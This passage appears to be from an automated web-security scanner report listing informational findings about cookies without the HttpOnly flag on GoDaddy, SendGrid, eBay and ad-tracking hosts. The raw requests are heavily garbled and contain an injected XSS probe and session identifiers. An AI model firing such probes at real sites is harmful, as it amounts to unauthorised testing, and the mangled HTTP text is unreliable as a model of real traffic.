GET /image.sbix?go=2223&pid=15 HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1-3144-4461-b3b4-5f9b3c734edc&h=&v=0; RMFL=011QqFEqU103Xq|U103zF; NXCLICK2=011QqFEuNX_Nonsecure!y!B3!3Xq!4qrNX_TRACK_Atandtwireless/Homepage_NX_Nonsecure!y!B3!3zF!5IxNX_TRACK_Atandtwireless/RTB_Retargeting_NX_Nonsecure!y!B3!gA!14l; mdata=1|2040695539456590|1313431890
Response
HTTP/1.1 200 OK-3144-4461-b3b4-5f9b3c734edc&h=&v=0&l=-8588854161174900426; domain=ib.mookie1.com; expires=Sun, 16-Sep-2012 16:32:47 GMT; path=/; HttpOnlySet-Cookie: ibkukinet=840399722=-8588854161174900426; path=/ .................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f.......[SNIP]...
11.29. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.30. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.31. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
11.32. http://landing.sendgrid.com/smtp-with-bullet-points/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://landing.sendgrid.com
Path:
/smtp-with-bullet-points/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:__ptcx=9GFPhk.3Gp89g.1; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/ __pcid=9GFPhk:1; Domain=.sendgrid.com; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/
Request
GET /smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK6ecdddc8dd049573f00e4"Set-Cookie: __ptcx=9GFPhk.3Gp89g.1; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/ Set-Cookie: __pcid=9GFPhk:1; Domain=.sendgrid.com; expires=Wed, 14 Mar 2012 15:26:40 GMT; Path=/ .performable.us.performable.com/catalog/2537.0/assets/images/HpeUB-sendgrid_logo.jpg" height="359" width="93" />...[SNIP]...
11.33. http://livechat.iadvize.com/chat_init.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/chat_init.js
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 15:26:50 GMT; path=/ 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A2%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%5C%2Fsmtp-relay-service.html%3Fgclid%3DCKqV0feJoqsCFQdzgwod6j2wjw%22%2C%22timeElapsed%22%3A0.02%7D; path=/
Request
GET /chat_init.js?sid=1821 HTTP/1.1/features/smtp-relay-service.html?gclid=CKqV0feJoqsCFQdzgwod6j2wjw;q=0.3
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 15:26:50 GMT; path=/ Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A2%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%5C%2Fsmtp-relay-service.html%3Fgclid%3DCKqV0feJoqsCFQdzgwod6j2wjw%22%2C%22timeElapsed%22%3A0.02%7D; path=/ .userAgent) && !(/Chrome/.test(navigator.userAgent))) {ByTagName( 'BODY' )[ 0 ];...[SNIP]...
11.34. http://livechat.iadvize.com/rpc/referrer.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/rpc/referrer.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp+server%22%2C%22origin%22%3A%22search+engine%22%2C%22refengine%22%3A%22Google%22%2C%22refkeyword%22%3A%22smtp+server%22%7D; path=/
Request
GET /rpc/referrer.php?s=1821&get=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp%2Bserver&random=1316204846918 HTTP/1.1/features/smtp-relay-service.html?gclid=CKqV0feJoqsCFQdzgwod6j2wjw;q=0.3aeffd3c6b449e3ce04e736ab952c62; 1821vvc=1; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%7D; 1821_idz=Wlkt70s3xZ6riGI4fumNJq%2FupYB8lAU%2F73%2Frx%2BlKcWm%2BPxOTMJA9USWEgtoWccdSkDkxnLE7JXOsJw5mlMEkzorVTslVkO%2BKndGjVRzv9ddZiIASn0aiI417pqnen2C%2BPCawyns5jF7t%2BJ6yDefIW%2BIt7Q4Z
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp+server%22%2C%22origin%22%3A%22search+engine%22%2C%22refengine%22%3A%22Google%22%2C%22refkeyword%22%3A%22smtp+server%22%7D; path=/ _site'] = 'http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=smtp server';iAdvize.vStats['origin'] = 'search engine';iAdvize.vStats['refengine'] = 'Google';iAdvize.vStats['...[SNIP]...
11.35. http://load.exelator.com/load/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://load.exelator.com
Path:
/load/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TFF=eJyVkjsOgzAMQO%252FCCWzziTELx%252BjKwFCpW7sh7t6EBhecUKVDFCt6L7ZlT0Ioy1OQpEJoRkIY%252B76napiEZLkLDv44An%252FBHq4Jj4GvDU%252FxHD2nWpnhb2guyFpJ7OLf821%252BTK%252F56m9raBdttmsP%252FeRt1xsf8mBaWdRKjZCJvAI1ZSrrHO98CFO%252BPef58Kc80XOqlRn%252Bzcyj42RytqYWcz2w7lQIU972oHnQeE61UmOfI2Tnnq%252FswBfncar9WxlxdiPBfXnO8HYjN%252F48G%252BbjRrLdyAtjfQNukQxI; expires=Sat, 14-Jan-2012 16:32:42 GMT; path=/; domain=.exelator.com
Request
GET /load/?p=104&g=210&j=0 HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SgjAQhN8lT3CXQAJJ408jM4oFGQdpHEpqS%252BXdJYLJwRhnpL1vb%252B92W42oH3eNoJlFSMpNnuecmU6jVJkZgNDsdC7t4Xi9XYqqsMy0A%252Fu5k05zakO14gtogolCGUwaMpppBQWDuOKQFOX%252BCehoOp7IYFoLlALuwXJHebIwcvdrEvgNpl%252FrmFZQgCPY7qiLq0J%252BAJnN1cKTfk2la%252FuL1xRt5K%252F4ClQkqiP9C51noMc%253D; TFF=eJyVkzsOgzAMhu%252FCCWzzcGIWjtGVgaFSt3ZD3L3hlYIJlTOgBPR9sa0%252F9EIo41uQpECoOkLovPdUtL2QjE%252FBNjwNu7DAvp0uPM58qXhq19ejx1GzGWGF6kQyNpqcP61nD4%252Fh1X%252BGwmjEKerU1Kv3h0drHY5aTmcUFCjJnMeBrzPy2DRrHqTyaBxsJN31VGNqhsWDfXvl9QyxDiqPo2Y19hwhmXu6swNvrsNRy%252B2MXPJGAv94l%252BD1jVz4czbu9B86fSNvjOkLi%252BQMlA%253D%253D; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D
Response
HTTP/1.1 302 FoundSet-Cookie: TFF=eJyVkjsOgzAMQO%252FCCWzziTELx%252BjKwFCpW7sh7t6EBhecUKVDFCt6L7ZlT0Ioy1OQpEJoRkIY%252B76napiEZLkLDv44An%252FBHq4Jj4GvDU%252FxHD2nWpnhb2guyFpJ7OLf821%252BTK%252F56m9raBdttmsP%252FeRt1xsf8mBaWdRKjZCJvAI1ZSrrHO98CFO%252BPef58Kc80XOqlRn%252Bzcyj42RytqYWcz2w7lQIU972oHnQeE61UmOfI2Tnnq%252FswBfncar9WxlxdiPBfXnO8HYjN%252F48G%252BbjRrLdyAtjfQNukQxI; expires=Sat, 14-Jan-2012 16:32:42 GMT; path=/; domain=.exelator.com .net/datapair?net=ex&segs=
11.36. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKSet-Cookie: ShopperId1=icrggiheobkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/ Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.37. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKSet-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
11.38. http://p.brilig.com/contact/bct
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://p.brilig.com
Path:
/contact/bct
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Sun, 08-Sep-2041 16:32:46 GMT
Request
GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1/*;q=0.5;q=0.7?ec1bb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E204f91ee9a2=1-c194-43c5-a151-713a1d7fc584
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Sun, 08-Sep-2041 16:32:46 GMT .net/datapair?net=vt
11.39. http://pixel.quantserve.com/seg/r
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/seg/r
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:d=EHoBGgHcB7vR0r2IHh2EsRA; expires=Thu, 15-Dec-2011 16:30:38 GMT; path=/; domain=.quantserve.com
Request
GET /seg/r;a=p-86ZJnSph3DaTI;rand=025670655;redirect=http://a.collective-media.net/datapair?net=qc&id=121773f9380f32f&segs=!qcsegs&op=add HTTP/1.1/*;q=0.5;q=0.7-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA
Response
HTTP/1.1 302 Found.net/datapair?net=qc&id=121773f9380f32f&segs=D&op=addSet-Cookie: d=EHoBGgHcB7vR0r2IHh2EsRA; expires=Thu, 15-Dec-2011 16:30:38 GMT; path=/; domain=.quantserve.com
11.40. http://pixel.rubiconproject.com/tap.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pixel.rubiconproject.com
Path:
/tap.php
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.rubiconproject.com rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C219%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.pixel.rubiconproject.com
Request
GET /tap.php?v=6432&rnd1316186960 HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3ziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; put_2132=439524AE8C6B634E021F5F7802166020; ruid=154e62c97432177b6a4bcd01^6^1315959802^840399722; csi15=3165738.js^1^1315959802^1315959802; csi2=3167262.js^1^1315960045^1315960045; put_1185=2944787775510337379; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C191%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C
Response
HTTP/1.1 200 OKSet-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.rubiconproject.com Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C219%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C; expires=Sun, 16-Oct-2011 15:29:22 GMT; path=/; domain=.pixel.rubiconproject.com !.......,...........T..;
11.41. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://powermta1.com
Path:
/wp-content/plugins/cforms/styling/sidebar-layout.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:fc=fcVal=9017447923497088384; domain=powermta1.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
Request
GET /wp-content/plugins/cforms/styling/sidebar-layout.css?f389a660 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.3
Response
HTTP/1.1 200 OKSet-Cookie: fc=fcVal=9017447923497088384; domain=powermta1.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]...
11.42. http://rover.ebay.com/ar/1/711-53200-19255-108/1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:npii=btrm/svid%3D646543881975054aa8f^cguid/62d7951f1320a479e7268c86ff361dd15054aa8f^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:19:27 GMT; Path=/
Request
GET /ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc= HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.%6052f505-1327309143dSet-Cookie: npii=btrm/svid%3D646543881975054aa8f^cguid/62d7951f1320a479e7268c86ff361dd15054aa8f^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:19:27 GMT; Path=/ .com/rover/1/711-53200-19255-108/1?mpt=206427233991&toolid=7115320019255108&customid=&campid=5336830850&rvr_id=265440014577&imp_rvr_id=2654400...[SNIP]...
11.43. http://s.amazon-cornerstone.com/iui3
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
